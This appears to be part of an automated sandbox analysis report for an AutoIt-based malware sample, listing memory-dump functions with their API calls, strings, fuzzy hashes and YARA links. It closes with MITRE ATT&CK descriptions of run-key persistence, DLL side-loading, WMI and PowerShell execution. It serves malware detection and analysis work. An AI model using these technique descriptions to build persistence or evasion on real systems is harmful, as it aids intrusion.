DestroyWindow.USER32(?,?,?,?), ref: 009A40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009A40F8

Strings

static, xrefs: 009A4058

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 9347327cc790ada40623c236955c03b9d40a976d26474b1daf44c5b47ba214c0
Instruction ID: 3e934f92f1701d25d0f27a1f749688f3b188f33e76fd5275a89d04c07d33e048
Opcode Fuzzy Hash: 9347327cc790ada40623c236955c03b9d40a976d26474b1daf44c5b47ba214c0
Instruction Fuzzy Hash: BB319071110614AADB14DF68CC80BFB77ADFF89724F008619F99587190DA71AC81EBA0

Function 009A4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 009A50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009A50D2

Strings

', xrefs: 009A502C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: fe1495673197796771198128f5594bf7411c4a12ded6a69270a5f887e21a16f3
Instruction ID: 70945bda6da3e0b5cbb6cbcde97b5d6878e3a85b6ba32ddb58b8a33256973e54
Opcode Fuzzy Hash: fe1495673197796771198128f5594bf7411c4a12ded6a69270a5f887e21a16f3
Instruction Fuzzy Hash: 2A310674B0161AAFDB14CF69C980BEA7BB9BF4A304F11406AE908AB351D771A945CFD0

Function 009A3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009A3D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009A3D23

Strings

Combobox, xrefs: 009A3CE5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 587d1402429aba71eb7de85f7282e211219d66b557dffb21d29d274117a39196
Instruction ID: 4985989a582d4f66980b2bb0ae191017aeb660e3c61aeccc8eff40d2e27404dd
Opcode Fuzzy Hash: 587d1402429aba71eb7de85f7282e211219d66b557dffb21d29d274117a39196
Instruction Fuzzy Hash: 4011E271700208BFEF118F54CC80FEB3B6EEB863A4F108124F9159B290D6319D5197E0

Function 009A41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00917873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009178B1
Part of subcall function 00917873: GetStockObject.GDI32(00000011), ref: 009178C5
Part of subcall function 00917873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009178CF

GetWindowRect.USER32(00000000,?), ref: 009A4216
GetSysColor.USER32(00000012), ref: 009A4230

Strings

static, xrefs: 009A41F3

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 36a82f27f1dbe78edf5d2cfe9f4b545573c123bab15f803d5b79d6ce992accf8
Instruction ID: c350b7f146d1e937e10560c772e4e143cf054bf92fdbf3b7be1ab837fc254a7d
Opcode Fuzzy Hash: 36a82f27f1dbe78edf5d2cfe9f4b545573c123bab15f803d5b79d6ce992accf8
Instruction Fuzzy Hash: 7611F672610209AFDB01DFA8CC45AEA7BB8EF89314F014914FD66E7250D675E851ABA0

Function 0098D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0098D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0098D7EB

Strings

<local>, xrefs: 0098D7AB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: e5aa8bf48bd47a7d40ff1b0d1a0a96fc01afb525da3cdbf32aa0e0df93de5b10
Instruction ID: 81a2406ca447c7b282a20315941d6453101e459ab109e44118eaf530384db01c
Opcode Fuzzy Hash: e5aa8bf48bd47a7d40ff1b0d1a0a96fc01afb525da3cdbf32aa0e0df93de5b10
Instruction Fuzzy Hash: 3C11E9B215723279D7385B668C45EF7BF5DEF127A4F104216F509932C0D6649940D7F0

Function 009775ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

CharUpperBuffW.USER32(?,?,?), ref: 0097761D
_wcslen.LIBCMT ref: 00977629

Strings

STOP, xrefs: 00977623, 00977628

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 8321fad780ed9a2c6ac273114adfcfae6383b46086b9e8a88923fb35f0ca14ea
Instruction ID: 7e28aa9094c095e82f7b8be8993cffd3af35e91455d7a094af675f09c4ed6937
Opcode Fuzzy Hash: 8321fad780ed9a2c6ac273114adfcfae6383b46086b9e8a88923fb35f0ca14ea
Instruction Fuzzy Hash: A001DB33614A2B9BCB109FFDDC449BFB3B9BF917507404924E429D3199EB31D940D691

Function 0097262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00972699

Strings

ComboBox, xrefs: 00972638
ListBox, xrefs: 00972663

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3abd779cce0649ab08fa78e2fef24be2418166d87e8d6ad097321c84bdb17cfd
Instruction ID: 4782686972c0d5c5e4aecd7fadc5cc44f96981b40ddd3abbfff63163fc86651c
Opcode Fuzzy Hash: 3abd779cce0649ab08fa78e2fef24be2418166d87e8d6ad097321c84bdb17cfd
Instruction Fuzzy Hash: 1A01D476655218ABCB08EBA4CC52EFE7779EFC6350B004A1BF836973C1DB355809C650

Function 00972525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00972593

Strings

ComboBox, xrefs: 00972532
ListBox, xrefs: 0097255D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0d9b23db4115b853d69042ce50024b2690543d4036ddce5a6c5b18e96060f290
Instruction ID: 550a7c7cea4bbe849be81e8010bea3a2c76f1cb626c8bdc523bed0905ad00117
Opcode Fuzzy Hash: 0d9b23db4115b853d69042ce50024b2690543d4036ddce5a6c5b18e96060f290
Instruction Fuzzy Hash: E401DBB6751108ABCB04E790C963FFF77B9DF85380F50401A7816A32C1DB149E09D6B1

Function 009725A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00972615

Strings

ComboBox, xrefs: 009725B6
ListBox, xrefs: 009725E1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d9871d2f12b7fa6574bad3a4e62be62412c76cdef19cc1b0ffbf2a2d8428c406
Instruction ID: 02bad65a1320bbf4142747e471c6be316c32cb984cb80d544ce9a6c362af3b54
Opcode Fuzzy Hash: d9871d2f12b7fa6574bad3a4e62be62412c76cdef19cc1b0ffbf2a2d8428c406
Instruction Fuzzy Hash: 8401D6B6B45108A7CB15E7A0D902FFF77AC9F45780F504027B816A3282DB658E09D6B1

Function 009726B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00972720

Strings

ComboBox, xrefs: 009726C2
ListBox, xrefs: 009726ED

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f39d15c105e3b274ffac0d796cf67fcce42cf94ad108b90f47d0e253516315e7
Instruction ID: 608fa1bc725bddf64871e6649406fb2107ca453461cfbd695875a0d6319698d0
Opcode Fuzzy Hash: f39d15c105e3b274ffac0d796cf67fcce42cf94ad108b90f47d0e253516315e7
Instruction Fuzzy Hash: 55F0F4B6B51218A6CB08A3A48C42FFE73BCAF85780F400916B436A32C2DB6468098260

Function 00971461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0097146F

Strings

AutoIt, xrefs: 00971463
Error allocating memory., xrefs: 00971468

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 13f4ab906c92508fe593d4640a8b6d49e110e19c0173f38e6443d15e1eb2f06c
Instruction ID: b68301519ed3625c5dbe950c3328a86e3b77c1014304c1890e84d44943e128df
Opcode Fuzzy Hash: 13f4ab906c92508fe593d4640a8b6d49e110e19c0173f38e6443d15e1eb2f06c
Instruction Fuzzy Hash: 49E0D83238D31837D22427D4AC03F8576848F8AB65F11481AF789558C28EE2649056D9

Function 009310B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0092FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009310E2,?,?,?,0091100A), ref: 0092FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0091100A), ref: 009310E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0091100A), ref: 009310F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009310F0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 27c078a13f632e78132937a76991a77acee08d16367034dd1cc36a85547ce7d4
Instruction ID: 6b9ef49af80a5e1274f017a0dd9da455dfcd5c30f6f00b2c107f1bdff273a7ef
Opcode Fuzzy Hash: 27c078a13f632e78132937a76991a77acee08d16367034dd1cc36a85547ce7d4
Instruction Fuzzy Hash: 0DE092706083508BD3309F64E905383BBF4EF44744F008D2DE896C2661EBB4E484CF91

Function 009839D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009839F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00983A05

Strings

aut, xrefs: 009839F9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e2c09b6cad3319ac2690147d5486159ea852b787711613283a722e2e87fc341b
Instruction ID: 56af9540ed34ef18781da1c07d8d4bbfc1e7a7e9d63be038f200c4139f6504d1
Opcode Fuzzy Hash: e2c09b6cad3319ac2690147d5486159ea852b787711613283a722e2e87fc341b
Instruction Fuzzy Hash: 1AD05EB254532867DA20A7A49C0EFCB7A6CDF45710F0002A1BE66A2095EAB0DA85CBD0

Function 009A2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009A2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009A2DDB

Part of subcall function 0097F292: Sleep.KERNEL32 ref: 0097F30A

Strings

Shell_TrayWnd, xrefs: 009A2DC1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f8c63756ef4a5f37a09b5ccab41fb09a695086d600523ed83b54e8ad08e77b30
Instruction ID: b066900a28be1801dc73107a771045d619c692d734d7ad2eaf2b633c98ae24ce
Opcode Fuzzy Hash: f8c63756ef4a5f37a09b5ccab41fb09a695086d600523ed83b54e8ad08e77b30
Instruction Fuzzy Hash: 23D0A9363AA300A6E228A3B0AC0BFD27A109F80B04F108821B20AAA1C0C8A06800C690

Function 009A2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009A2E08
PostMessageW.USER32(00000000), ref: 009A2E0F

Part of subcall function 0097F292: Sleep.KERNEL32 ref: 0097F30A

Strings

Shell_TrayWnd, xrefs: 009A2E01

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 57f09d66793936dc592958c2456bbd37db20eb893f9d3788f62c30808f10dc48
Instruction ID: 8188bd298810bfe32f9ccb5cc3d70def838539d4f9a95842ffdd6550a2a7dac0
Opcode Fuzzy Hash: 57f09d66793936dc592958c2456bbd37db20eb893f9d3788f62c30808f10dc48
Instruction Fuzzy Hash: ACD0A9323DA3006AE228A3B0AC0BFC27A109F81B04F108821B20AAA1C0C8A06800C694

Function 0094C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0094C213
GetLastError.KERNEL32 ref: 0094C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0094C27C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e8f7c6699ddc623a6320929a0f9f51a0d051179e0120a242e49a771204cad7a8
Instruction ID: 846bb314a6ceaa971631dc7f3158eda9255821269d0aad7318402a7e6c3cb4b4
Opcode Fuzzy Hash: e8f7c6699ddc623a6320929a0f9f51a0d051179e0120a242e49a771204cad7a8
Instruction Fuzzy Hash: FA4107B0606206EFDB618FE5C844FAA7BA9EF51310F244169F8659B1A1DBF0CD00CB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

